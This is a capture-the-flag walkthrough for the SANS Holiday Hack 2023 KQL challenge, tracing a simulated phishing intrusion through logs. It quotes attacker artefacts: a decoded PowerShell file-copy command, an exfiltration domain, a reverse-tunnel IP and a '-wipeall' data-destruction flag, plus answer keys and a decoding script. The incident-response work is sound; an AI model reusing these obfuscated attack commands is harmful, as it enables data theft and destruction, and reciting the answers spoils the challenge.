You can download the solution set from the link below or follow along with the article.
Onboarding - Welcome to SANS Holiday Hack 2023!
Make sure you create a cluster and run the scripts provided to create the tables and the required functions.
For more information, you can check the FAQs at
Question - How many Craftsperson Elves are working from laptops?
This one is straightforward. The following query counts the distinct usernames whose role is Craftsperson Elf and whose hostname contains 'laptop':
Employees
| where hostname contains 'laptop' and role =~ 'craftsperson elf'
| distinct username
| count
Answer – 25
Case 1 Welcome to Operation Giftwrap: Defending the Geese Island network
The first question is: What is the email address of the employee who received this phishing email?
This problem gives us the link the attacker used, namely 'http://madelvesnorthpole.org/published/search/MonthlyInvoiceForReindeerFood.docx'
I checked the SecurityAlerts table but could not find anything.
Hence, I turned my attention to another table, which lists outbound network connections along with the source IP. Following is the query.
OutboundNetworkEvents
| where url contains 'MonthlyInvoiceForReindeerFood.docx'
| project timestamp, src_ip
Running this query gives us the source IP, which is 10.10.0.4
We know that the Employees table stores employee details such as hostname, username, email address, domain name and so on.
Let us use the source IP to find our employee.
Employees
| where ip_addr == '10.10.0.4'
| project email_addr, username, hostname, role
Another approach is to query the Email table for the same phishing link.
Either way, we get the answers to all three questions:
Q1 - What is the email address of the employee who received this phishing email?
Ans - alabaster_snowball@santaworkshopgeeseislands.org
Q2 - What is the email address that was used to send this spear phishing email?
Ans - cwombley@gmail.com
Q3 - What was the subject line used in the spear phishing email?
Ans - [EXTERNAL] Invoice foir reindeer food past due (the misspelling "foir" is in the original subject line)
Case 2 Someone got phished! Let's dig deeper on the victim...
All the details can be fetched from the Employees table.
Following is the query –
Employees
| where email_addr == 'alabaster_snowball@santaworkshopgeeseislands.org'
| project role, hostname, ip_addr
Q1- What is the role of our victim in the organization?
Ans- Head Elf
Q2- What is the hostname of the victim's machine?
Ans- Y1US-DESKTOP
Q3- What is the source IP linked to the victim?
Ans- 10.10.0.4
Case 3 That's not good. What happened next?
Q1 - What time did Alabaster click on the malicious link? Make sure to copy the exact timestamp from the logs!
Query-
OutboundNetworkEvents
| where src_ip == '10.10.0.4' and url contains 'MonthlyInvoiceForReindeerFood.docx'
| project timestamp
Answer- 2023-12-02T10:12:42Z
Q2- What file is dropped to Alabaster's machine shortly after he downloads the malicious file?
Ans- We can run the following query to check for file creation events on the hostname we extracted earlier, starting from the click timestamp.
FileCreationEvents
| where hostname == 'Y1US-DESKTOP' and timestamp >= datetime(2023-12-02T10:12:42Z)
| sort by timestamp asc
We only need the events on 2023-12-02 from 10:12:42Z onward, which is what the timestamp filter above restricts the output to.
We get the following two results.
The answer is giftwrap.exe
Case 4 A compromised host! Time for a deep dive.
Q1- The attacker created a reverse tunnel connection with the compromised machine. What IP was the connection forwarded to?
Ans- Here, the clue is "forwarded to", so let us look at the ProcessEvents table for command lines containing the string "forward". We already have the victim's hostname, so let us use it to narrow the search.
ProcessEvents
| where hostname == 'Y1US-DESKTOP' and process_commandline contains 'forward'
Following is the output.
The answer is 113.37.9.17
Q2- What is the timestamp when the attackers enumerated network shares on the machine?
Ans- The clue is in the question itself; let us query the same table for the string "share".
ProcessEvents
| where hostname == 'Y1US-DESKTOP' and process_commandline contains 'share'
The answer is 2023-12-02T16:51:44Z
Q3- What was the hostname of the system the attacker moved laterally to?
The share-enumeration result above also gives us the parent_process_hash of the attacker's process, so let us pivot on that hash to see everything else it spawned.
ProcessEvents
| where hostname == 'Y1US-DESKTOP' and parent_process_hash =~ '614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f'
We get a few records, and in one of them we can see that a network share location was accessed.
The answer is NorthPolefileshare
Case 5 A hidden message
For this case, please make sure that you hit the "Train me for this case" button, as it gives a good explanation of base64 encoding and decoding using KQL functions.
Without further ado, let us dive into the questions.
Q1- When was the attacker's first base64 encoded PowerShell command executed on Alabaster's machine?
Ans- We can use the following query to list the PowerShell commands the attacker's process executed on the victim's machine. The clue here is "powershell".
ProcessEvents
| where hostname == 'Y1US-DESKTOP' and parent_process_hash =~ '614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f'
| where process_commandline contains 'powershell.exe'
| sort by timestamp asc
Answer is 2023-12-24T16:07:47Z
Q2- What was the name of the file the attacker copied from the fileshare? (This might require some additional decoding)
Decoding the string with base64_decode_tostring() gives the following output.
print(base64_decode_tostring("KCAndHh0LnRzaUxlY2lOeXRoZ3VhTlxwb3Rrc2VEXDpDIHR4dC50c2lMZWNpTnl0aGd1YU5cbGFjaXRpckNub2lzc2lNXCRjXGVyYWhzZWxpZmVsb1BodHJvTlxcIG1ldEkteXBvQyBjLSBleGUubGxlaHNyZXdvcCcgLXNwbGl0ICcnIHwgJXskX1swXX0pIC1qb2luICcn"))
Output
( 'txt.tsiLeciNythguaN\potkseD\:C txt.tsiLeciNythguaN\lacitirCnoissiM\$c\erahselifeloPhtroN\\ metI-ypoC c- exe.llehsrewop' -split '' | %{$_[0]}) -join ''
Notice that the command inside the single quotes is written backwards, so we only need to reverse that quoted payload to recover it.
You can use any online string-reversal page to do the work for you.
Reversing the quoted payload gives: powershell.exe -c Copy-Item \\NorthPolefileshare\c$\MissionCritical\NaughtyNiceList.txt C:\Desktop\NaughtyNiceList.txt
Looking at the above output, we have our answer, which is NaughtyNiceList.txt
Q3- The attacker has likely exfiltrated data from the file share. What domain name was the data exfiltrated to?
Ans- Let us run the same query again and decode the strings from the second and third rows of the output.
ProcessEvents
| where hostname == 'Y1US-DESKTOP' and parent_process_hash =~ '614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f'
| where process_commandline contains 'powershell.exe'
| sort by timestamp asc
Decoding the second string in the same way gives the following output.
print(base64_decode_tostring("..."))
We can see the output is a join of lots of numbers. I copied the entire number array into Excel and replaced all commas with blank spaces. I then went to an online decimal-to-ASCII converter and inserted the number array, as can be seen below.
This gives us our answer, which is giftbox.com
Case 6 - The final step!
Q1- What is the name of the executable the attackers used in the final malicious command?
Ans- Rather than going back and forth decoding base64 strings by hand, let us use the parse-where operator to extract and decode them in the same query.
ProcessEvents
| where hostname == 'Y1US-DESKTOP' and parent_process_hash =~ '614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f' and process_commandline contains '-enc'
| parse-where process_commandline with @'C:\Windows\System32\powershell.exe -Nop -ExecutionPolicy bypass -enc ' base64string
| extend DecodedBase64 = base64_decode_tostring(base64string)
| project timestamp, parent_process_name, DecodedBase64
Looking at the last row of the output, we can see the name of the executable, which is downwithsanta.exe
Q2- What was the command line flag used alongside this executable?
From the same output, the flag used alongside this executable is
-wipeall
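The decoding steps used by hand in Case 5 and in the Case 6 query (pulling the base64 argument out of the command line, base64-decoding it, un-reversing the single-quoted payload, and turning a decimal character array back into text) collected into one offline Python script. This is an added example, not the walkthrough's own code: the first base64 string is the one from Case 5 Q2 above; the numeric-array payload and the -enc command line are constructed stand-ins because the page does not reproduce those strings; and the UTF-16LE branch is a caveat for real PowerShell -EncodedCommand payloads, which the challenge data (plain UTF-8, hence base64_decode_tostring works in KQL) does not use.

```python
import base64
import re

# Verbatim from Case 5 Q2 above: the reversed Copy-Item payload.
REVERSED_PAYLOAD_B64 = (
    "KCAndHh0LnRzaUxlY2lOeXRoZ3VhTlxwb3Rrc2VEXDpDIHR4dC50c2lMZWNpTnl0aGd1YU5c"
    "bGFjaXRpckNub2lzc2lNXCRjXGVyYWhzZWxpZmVsb1BodHJvTlxcIG1ldEkteXBvQyBjLSBl"
    "eGUubGxlaHNyZXdvcCcgLXNwbGl0ICcnIHwgJXskX1swXX0pIC1qb2luICcn"
)

# Constructed stand-in for the second payload (not reproduced on this page):
# a PowerShell fragment that rebuilds a hostname from decimal character codes.
CONSTRUCTED_NUMERIC_CMD = (
    "$h = ((103,105,102,116,98,111,120,46,99,111,109) | %{[char]$_}) -join ''"
)
CONSTRUCTED_NUMERIC_B64 = base64.b64encode(CONSTRUCTED_NUMERIC_CMD.encode()).decode()

# Constructed command line in the shape the Case 6 parse-where expects.
CONSTRUCTED_ENC_CMDLINE = (
    r"C:\Windows\System32\powershell.exe -Nop -ExecutionPolicy bypass -enc "
    + CONSTRUCTED_NUMERIC_B64
)

# Constructed real-PowerShell-style payload: -EncodedCommand takes UTF-16LE.
CONSTRUCTED_UTF16_B64 = base64.b64encode("whoami".encode("utf-16-le")).decode()

# -enc plus the other spellings PowerShell accepts; -ExecutionPolicy does not
# match because no whitespace follows "-E".
ENC_FLAG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def b64_to_text(b64: str) -> str:
    """Decode a base64 blob to text. A UTF-16LE payload of ASCII text has a NUL
    in every odd byte; everything else is treated as UTF-8, as in the KQL."""
    raw = base64.b64decode(b64)
    if raw and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("utf-8")


def extract_encoded_command(cmdline: str) -> str:
    """Mirror of the Case 6 parse-where: return the base64 argument after -enc."""
    match = ENC_FLAG.search(cmdline)
    if not match:
        raise ValueError("no -enc argument in command line")
    return match.group(1)


def unreverse_quoted_payload(decoded: str) -> str:
    """Case 5 Q2: the decoded script carries the real command written backwards
    inside single quotes; extract that payload and reverse it."""
    match = re.search(r"'([^']+)'", decoded)
    if not match:
        raise ValueError("no single-quoted payload found")
    return match.group(1)[::-1]


def numbers_to_text(decoded: str) -> str:
    """Case 5 Q3: the decoded script hides a string as a comma-separated list of
    decimal character codes. Take the longest comma-separated run so stray
    digits in the wrapper (e.g. $_[0]) are not swallowed."""
    runs = re.findall(r"\d{1,3}(?:\s*,\s*\d{1,3})+", decoded)
    if not runs:
        raise ValueError("no decimal character array found")
    longest = max(runs, key=len)
    return "".join(chr(int(n)) for n in re.split(r"\s*,\s*", longest))


if __name__ == "__main__":
    # Case 5 Q2: base64 -> reversed quoted payload -> command.
    print(unreverse_quoted_payload(b64_to_text(REVERSED_PAYLOAD_B64)))
    # Case 6 style: command line -> base64 -> decimal array -> text.
    encoded = extract_encoded_command(CONSTRUCTED_ENC_CMDLINE)
    print(numbers_to_text(b64_to_text(encoded)))
    # Caveat: a real -EncodedCommand payload decodes as UTF-16LE.
    print(b64_to_text(CONSTRUCTED_UTF16_B64))
```

The script runs with no network access; if you paste a real -EncodedCommand value from a Windows host into extract_encoded_command, the UTF-16LE branch of b64_to_text is what keeps the result readable instead of interleaved with NUL bytes.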
Congratulations, that is it! You can decode the last one yourself to get the full decoded base64 string, which is